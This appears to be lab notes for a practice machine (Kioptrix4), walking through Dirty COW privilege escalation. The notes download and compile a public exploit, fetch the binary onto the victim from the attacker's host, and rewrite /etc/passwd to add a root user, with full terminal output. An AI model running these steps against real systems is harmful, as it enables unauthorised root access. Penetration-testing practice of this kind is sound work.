============================'Dirty COW' 'PTRACE_POKEDATA'(/etc/passwd Method)=======================

1. Download ('Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method))
****************************************************************************************************

root@noondi:~# wget --no-check-certificate  https://www.exploit-db.com/download/40839.c

2. Compile exploit
*****************
root@noondi:~# gcc -pthread 40839.c -o dirty -lcrypt

3. Download file on victim's machine again, give it write permissions:
*********************************************************************
john@Kioptrix4:/tmp$ wget http://192.168.209.179/privesc/dirty
john@Kioptrix4:/tmp$ chmod 755 dirty
john@Kioptrix4:/tmp$ 
john@Kioptrix4:/tmp$ 

4. Run the exploit
*******************
john@Kioptrix4:/tmp$ ./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: 
Complete line:
firefart:fiEvDXjT0rO.w:0:0:pwned:/root:/bin/bash

mmap: b7fc3000

madvise 0

ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '123@abc'.


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '123@abc'.


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
john@Kioptrix4:/tmp$ 

5. You have a new user with root privileges
*******************************************
root@noondi:~# ssh firefart@192.168.209.184
firefart@192.168.209.184's password: 
Failed to add entry for user firefart.

Welcome to LigGoat Security Systems - We are Watching
firefart@Kioptrix4:~# id
uid=0(firefart) gid=0(root) groups=0(root)
firefart@Kioptrix4:~# 
firefart@Kioptrix4:~# 
firefart@Kioptrix4:~# 
firefart@Kioptrix4:~# whoami
firefart
firefart@Kioptrix4:~# mv /tmp/passwd.bak /etc/passwd
